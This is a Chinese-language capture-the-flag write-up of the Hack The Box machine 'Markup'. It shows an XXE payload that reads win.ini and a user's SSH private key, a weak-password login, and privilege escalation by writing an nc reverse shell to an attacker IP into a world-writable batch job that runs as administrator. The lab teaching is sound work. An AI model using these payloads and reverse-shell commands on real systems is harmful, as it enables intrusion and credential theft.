HTB_Markup_xml注入读ssh私钥进程注入

news2024/11/24 5:22:31

文章目录

    • 信息收集
    • xml注入
    • ssh 私钥连接
    • 提权

信息收集

使用如下参数可以探测具体版本,只使用-sV -v无此效果

nmap -sC -A -Pn 10.129.95.192

在这里插入图片描述

是个登录页面

在这里插入图片描述

弱口令,只有admin-password成功登录

在这里插入图片描述

几个页面,只有order.php页面可以与后端交互并传递xml格式数据

在这里插入图片描述

xml注入

payload如下,注意标签要和原本标签一致,否则可能不会解析,windows 读取 win.ini敏感文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
<order>
    <quantity>
        111
    </quantity>
    <item>
        &test;
    </item>
    <address>
        11111
    </address>
</order>

在这里插入图片描述

继续查看敏感文件,在页面源代码中发现 modified by daniel,疑似系统用户,尝试读取 ssh 私钥

<!DOCTYPE ANY [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>

在这里插入图片描述

保存到本地,使用文本编辑器注意 id_rsa文件最后一行要留一个换行符,否则 ssh 客户端无法解析

在这里插入图片描述

ssh 私钥连接

为文件赋予权限

# r=4 w=2 x=1 读、写、运行
chmod 400 id_rsa

在这里插入图片描述

连接,得到普通 shell

ssh -i id_rsa daniel@10.129.95.192

提权

Windows 查看用户权限

whoami /priv

在这里插入图片描述

没有什么有用的权限

在这里插入图片描述

切换目录

C:\Users\daniel>cd C:\

LogManagenebt目录下发现一个批处理文件,功能是清理日志事件

# 关闭后面命令的输出
@echo off 
# 执行 bcdedit 命令 (并获取当前用户?) %%V 类似 for 循环的 i
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
# 判断用户是否是管理员 (为)
    IF (%adminTest%)==(Access) goto noAdmin
    	# wevtutil.exe 日志清理工具 系统自带 el列出事件日志
        for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
            echo.
            echo Event Logs have been cleared!
            goto theEnd
        # 回调函数 cl清理日志事件
        :do_clear
            wevtutil.exe cl %1
            goto :eof
        :noAdmin
            echo You must run this script as an Administrator!
    :theEnd
exit

运行中,管理员权限

# 转换为 powershell 很多命令在此环境才能解析
powershell
# 列出进程
ps

在这里插入图片描述

查看此文件权限,icacls相当于 chmod

icacls job.bat

BUILTIN\Users:(F)代表所有本地用户对此文件有完全控制权

在这里插入图片描述

思路是将反弹shell命令写入到此运行文件中

下载 nc,目标不出网,连接攻击机下载

# 攻击机
python3 -m http.server 8000
# 目标主机
wget http://10.10.16.3:8000/nc64.exe -o nc64.exe

退出powershell ,执行命令,nc 监听

# 直接反弹同权限 shell
.\nc64.exe 10.10.16.3 1234 -e cmd.exe
# 将命令写入文件
echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.3 1234>C:\Log-Management\job.bat

反弹成功

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/189091.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Kubernetes 企业项目实战】06、基于 Jenkins+K8s 构建 DevOps 自动化运维管理平台(中)

目录 一、基于 Jenkinsk8sGitDocker Hub 等技术链构建企业级 DevOps 容器云平台 1.1 安装 Jenkins 1.1.1 安装 nfs 服务 1.1.2 在 kubernetes 中部署 jenkins 1.2 配置 Jenkins ​1.2.1 获取管理员密码 1.2.2 安装插件 1.2.3 创建第一个管理员用户 1.3 测试 jenkins 的…

VMware Workstation中安装Kali 2022

VMware Workstation中安装Kali 2022 前言 开工了&#xff0c;笔记本中的相关工具该更新了&#xff0c;今天记录一下。 首先记录的是在VMware Workstation中安装kali&#xff0c;这个过程比较简单。 我只是想扩充一下自己的博客&#xff0c;另外可以给入门人员一个参考。 下载…

react的JSX语法

1.jsx基本使用 1 createElement() 的问题 繁琐不简洁。不直观&#xff0c;无法一眼看出所描述的结构。不优雅&#xff0c;用户体验不爽。 2 JSX 简介 JSX 是 JavaScript XML 的简写&#xff0c;表示在 JavaScript 代码中写 XML&#xff08;HTML&#xff09; 格式的代码。 优…

通信原理笔记—增量调制(∆M)

目录 概述&#xff1a; 简单增量调制(∆M)原理&#xff1a; 编码器与解码器 简单△M的过载问题&#xff1a; 增量总和(∆-Σ)调制 数字压扩自适应增量调制&#xff1a; 不同编码调制方式的误码性能分析&#xff1a; 概述&#xff1a; 最简单的DPCM是增量调制&#xff0c…

layui框架学习(4:导航)

layui官网教程采用html中的无序列表和定义列表来实现导航样式&#xff08;文章最后还有个关于导航所用元素的补充说明&#xff09;&#xff0c;主要包括水平导航、垂直/侧边导航&#xff0c;同时还支持用span和a元素实现面包屑导航样式。导航功能需要加载element模块&#xff0…

实验二:Linux主机漏洞利⽤攻击实践

&#xff08;一&#xff09;实验简介 实验所属系列&#xff1a;windows主机漏洞利用攻击实践 实验对象&#xff1a;本科/专科信息安全专业 相关课程&#xff1a;渗透测试 实验时数&#xff08;学分&#xff09;&#xff1a;2学时 实验类别&#xff1a;实践类 &#xff08;二&a…

如何集中式管理多个客户端节点传输任务-镭速

在一些生产制造企业或it部门&#xff0c;它们的生产机器设备每天都会有大量的生产数据&#xff0c;并且需要人为地对这些数据进行迁移或者归档备份到其他存储。这样重复性的操作&#xff0c;无疑大大提高了人工成本&#xff0c;而且运作起来的效率也不高。 镭速服务器集中式任务…

MySQL优化方案

一、MySQL 的优化方案有哪些&#xff1f;MySQL 数据库常见的优化手段分为三个层面&#xff1a;SQL 和索引优化、数据库结构优化、系统硬件优化等&#xff0c;每个大的方向中又包含多个小的优化点。1.SQL 和索引优化通过优化 SQL 语句以及索引来提高 MySQL 数据库的运行效率① 使…

【UE5】动画系统

title: 【UE5】动画系统 date: 2023-01-31 19:50:47 tags: UE5 categories: 学习笔记 password: abstract: message: 最近接触的项目涉及到动捕和动画&#xff0c;以前接触的范围主要是GamePlay以及C和蓝图的交互&#xff0c;很少接触动画&#xff0c;借此机会学习一下UE5的动…

【Jmeter】报错解决:JedisException: Could not return the broken resource to the pool

一、报错详情 (1)报错场景 使用 Jmeter 插件 Redis Data Set 配置连接 Redis 数据池时,运行出现报错 (2)报错日志

Python对liunx中mysql数据库进行单表查询 10个案例带你了解

关于Python连接liunx中mysql数据库的方式在这一篇文章 这里写目录标题1.在Liunx服务器中的mysql新建一个表2.插入数据3.连接liunx中的mysql数据库1、查询1946班的成绩信息2&#xff0c;查询1944班&#xff0c;语文成绩大于60小于90的成绩信息3&#xff0c;查询学生表中1到6行的…

QTabWidget 美化 qss

1. tab&#xff0c; tab-bar&#xff0c; pane属性分布 2. 使用qss美化时&#xff0c;tab标签上和pane中都能美化成功&#xff0c;但tab最右侧的tab-bar却始终没有成功。 /*设置控件的背景*/ QTabWidget {background-color:rgb(4,138,224); } /*设置控件下面板的背景颜色*/ QT…

C++11 常用的新特性

本篇介绍C11标准对比之前C标准的新特性&#xff0c;C11为C语言在2011年发布的版本&#xff0c;它改进幅度很大&#xff0c;影响至今。如加入auto 关键字、nullptr、移动语义&#xff08;move semantics&#xff09;、委托构造函数&#xff08;delegating constructors&#xff…

ChatGPT超详细注册与使用教程

文章目录前言一、ChatGPT账号注册二、SMS-ACTIVATE虚拟手机号验证三、ChatGPT使用总结前言 最近ChatGPT非常火爆&#xff0c;是一种革命性的技术&#xff0c;这也吸引来了很多人想尝试一下&#xff0c;但是由于并没有在国内开通这项服务&#xff0c;所以国内的用户无法使用Chat…

Javascript预解析

1.我们js引擎运行js 分为两步&#xff0c;1.预解析&#xff0c;2.执行代码 &#xff08;1&#xff09;预解析&#xff1a;js引擎会把js里面所有的var还有function提升到当前作用域发的前面 &#xff08;2&#xff09;执行代码&#xff1a;按照代码书写的顺序从上往下执行 2.预…

RK3588平台开发系列讲解(进程篇)进程的处理器亲和性

平台内核版本安卓版本RK3588Linux 5.10Android 12文章目录 一、简介二、相关结构体三、函数接口四、cpuset的使用沉淀、分享、成长,让自己和他人都能有所收获!😄 📢本篇介绍进程的处理器亲和性相关知识。 一、简介 Linux进程调度器为了充分利用CPU资源,会将进程在不同的…

如何养成整洁的代码习惯

如何养成整洁的代码习惯前言1.为什么要保持代码整洁?1.1 所以从一开始就要保持整洁1.2 如何写出整洁的代码?2.命名2.1 不好的命名方式1.没有任何意义的命名方式2.命名前后不一致3.命名冗余3.类3.1单一职责3.2 开闭原则3.3 内聚4.函数4.1 只做一件事4.2 函数命名1.函数名应见名…

春季开学必备物品清单、数码好物推荐篇

开学的脚步近了&#xff0c;近了&#xff0c;大学生返校&#xff0c;万物更新&#xff0c;大家迎接开学季的阵仗堪比迎接春天了。灵魂发问&#xff1a;开学装备备齐了吗&#xff1f;大学生们的情绪调整好了吗&#xff1f;自己要不要再回回炉&#xff0c;充充电&#xff1f;这次…

【redis6】第十二章(持久化)

RDB RDB是什么 在指定的时间间隔内将内存中的数据集快照写入磁盘&#xff0c; 也就是行话讲的SNAPSHOT快照&#xff0c;它恢复时是将快照文件直接读到内存里 备份是如何执行的 Redis会单独创建&#xff08;fork&#xff09;一个子进程来进行持久化&#xff0c;会先将数据写…

ARM学习(17)ARM函数调用规则

笔者来聊聊ARM的函数的调用规则 你好&#xff01; 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章&#xff0c;了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持&…